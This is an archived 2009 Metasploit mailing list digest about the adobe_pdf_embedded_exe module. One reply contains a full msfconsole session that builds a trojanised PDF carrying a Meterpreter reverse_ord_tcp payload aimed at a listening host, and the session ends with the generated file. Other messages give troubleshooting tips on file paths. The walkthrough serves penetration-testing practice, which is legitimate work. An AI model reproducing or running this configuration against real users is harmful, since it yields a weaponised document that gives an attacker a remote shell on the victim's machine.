Metasploit mailing list archives

Framework Digest, Vol 20, Issue 25

From: mr.r.birtles at gmail.com (ricky-lee birtles)
Date: Sun, 27 Sep 2009 11:04:04 +0100

moshe,

Have a look through the following genaration of a pdf with the exploit
you are looking at and see if there is
anything you have missed. Hopefully this will help.

usr at endure /msf3
$ ./msfconsole
*** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer,
things may break!
*** Please report bugs to msfdev[at]metasploit.com

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 405 exploits - 260 payloads
+ -- --=[ 21 encoders - 8 nops
       =[ 189 aux

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options

Module options:

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   EXENAME                       no        The Name of payload exe.
   FILENAME    evil.pdf          no        The output filename.
   INFILENAME  msf.pdf           no        The Input PDF filename.
   OUTPUTPATH  ./data/exploits/  no        The location to output the file.


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)


msf exploit(adobe_pdf_embedded_exe) > set EXENAME out.exe
EXENAME => out.exe
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /tmp/373.pdf
INFILENAME => /tmp/373.pdf
msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /tmp/
OUTPUTPATH => /tmp/
msf exploit(adobe_pdf_embedded_exe) > set FILENAME msf_file.pdf
FILENAME => msf_file.pdf
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD
windows/meterpreter/reverse_ord_tcp
PAYLOAD => windows/meterpreter/reverse_ord_tcp
msf exploit(adobe_pdf_embedded_exe) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXENAME     out.exe          no        The Name of payload exe.
   FILENAME    msf_file.pdf     no        The output filename.
   INFILENAME  /tmp/373.pdf     no        The Input PDF filename.
   OUTPUTPATH  /tmp/            no        The location to output the file.


Payload options (windows/meterpreter/reverse_ord_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)


msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.10.101
LHOST => 192.168.10.101
msf exploit(adobe_pdf_embedded_exe) > exploit

[*] Started reverse handler
[*] Reading in '/tmp/373.pdf'...
[*] Parseing '/tmp/373.pdf'...
[*] Parseing Successfull.
[*] Using 'out.exe' as payload...
[*] Creating 'msf_file.pdf' file...
[*] Generated output file /tmp/msf_file.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >



-- Mr R Birtles



2009/9/27 Moshe Ben Simon <moshe at injection.co.il>:

Hi HD

I look over the " adobe_pdf_embedded_exe" ruby script and find the variable

INFILENAME, EXENAME, FILENAME,OUTPUTPATH but when I try to use them I get
again the error...

Can somebody help me on the syntax....

Help....:)


Moshe

-----Original Message-----
From: framework-bounces at spool.metasploit.com
[mailto:framework-bounces at spool.metasploit.com] On Behalf Of
framework-request at spool.metasploit.com
Sent: Saturday, September 26, 2009 9:00 PM
To: framework at spool.metasploit.com
Subject: Framework Digest, Vol 20, Issue 25

Send Framework mailing list submissions to
? ? ? ?framework at spool.metasploit.com

To subscribe or unsubscribe via the World Wide Web, visit
? ? ? ?https://mail.metasploit.com/mailman/listinfo/framework
or, via email, send a message with subject or body 'help' to
? ? ? ?framework-request at spool.metasploit.com

You can reach the person managing the list at
? ? ? ?framework-owner at spool.metasploit.com

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Framework digest..."


Today's Topics:

? 1. adobe_pdf_embedded_exe (Moshe Ben Simon)
? 2. adobe_pdf_embedded_exe (Moshe Ben Simon)
? 3. Re: adobe_pdf_embedded_exe (Jerome Athias)
? 4. Re: adobe_pdf_embedded_exe (HD Moore)


----------------------------------------------------------------------

Message: 1
Date: Sat, 26 Sep 2009 16:01:17 +0300 (IDT)
From: "Moshe Ben Simon" <moshe at injection.co.il>
To: framework at spool.metasploit.com
Subject: [framework] adobe_pdf_embedded_exe
Message-ID:
? ? ? ?<77fe340193a0c1c3972792e3adb68e33.squirrel at mail.injection.co.il>
Content-Type: text/plain;charset=iso-8859-1

I read the article on pdf with meterpreter and test your
"adobe_pdf_embedded_exe".

I get all the time the same error:

"Exploit failed: No such file or directory - msf.pdf"

Do you know why??

I have pdf file called msf.pdf in the directory /data/exploit under
framewaork3





------------------------------

Message: 2
Date: Sat, 26 Sep 2009 15:42:29 +0200
From: "Moshe Ben Simon" <moshe at injection.co.il>
To: <framework at spool.metasploit.com>
Subject: [framework] adobe_pdf_embedded_exe
Message-ID: <20090926131230.4BC20307D6 at slug.metasploit.com>
Content-Type: text/plain; charset="us-ascii"

I read the article on pdf with meterpreter and test your
"adobe_pdf_embedded_exe".

I get all the time the same error:

"Exploit failed: No such file or directory - msf.pdf"

Do you know why.?

I have pdf file called msf.pdf in the directory /data/exploit under
framewaork3

-------------- next part --------------
An HTML attachment was scrubbed...
URL:
<http://mail.metasploit.com/pipermail/framework/attachments/20090926/f2701fc
c/attachment-0001.html>

------------------------------

Message: 3
Date: Sat, 26 Sep 2009 16:21:37 +0200
From: Jerome Athias <jerome.athias at free.fr>
To: moshe at injection.co.il
Cc: framework at spool.metasploit.com
Subject: Re: [framework] adobe_pdf_embedded_exe
Message-ID: <1253974897.4336.3.camel at acer>
Content-Type: text/plain

Heya,

you should learn more about this here:
http://www.stoned-vienna.com

Good luck
/JA



------------------------------

Message: 4
Date: Sat, 26 Sep 2009 09:34:33 -0500
From: HD Moore <hdm at metasploit.com>
To: framework at spool.metasploit.com
Subject: Re: [framework] adobe_pdf_embedded_exe
Message-ID: <1253975673.4181.43.camel at localhost>
Content-Type: text/plain; charset="UTF-8"

On Sat, 2009-09-26 at 15:42 +0200, Moshe Ben Simon wrote:

I read the article on pdf with meterpreter and test your
"adobe_pdf_embedded_exe".

I get all the time the same error:

"Exploit failed: No such file or directory - msf.pdf"

Do you know why??


You have to specify the full path for the input file, and the output
directory, and output file name for the created PDF

-HD



------------------------------

_______________________________________________
Framework mailing list
Framework at spool.metasploit.com
https://mail.metasploit.com/mailman/listinfo/framework


End of Framework Digest, Vol 20, Issue 25
*****************************************

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

Framework Digest, Vol 20, Issue 25 Moshe Ben Simon (Sep 27)
- Framework Digest, Vol 20, Issue 25 ricky-lee birtles (Sep 27)
  - explanation of reverse_tcp vs. reverse_ord_tcp and memory execution Jeffs (Sep 27)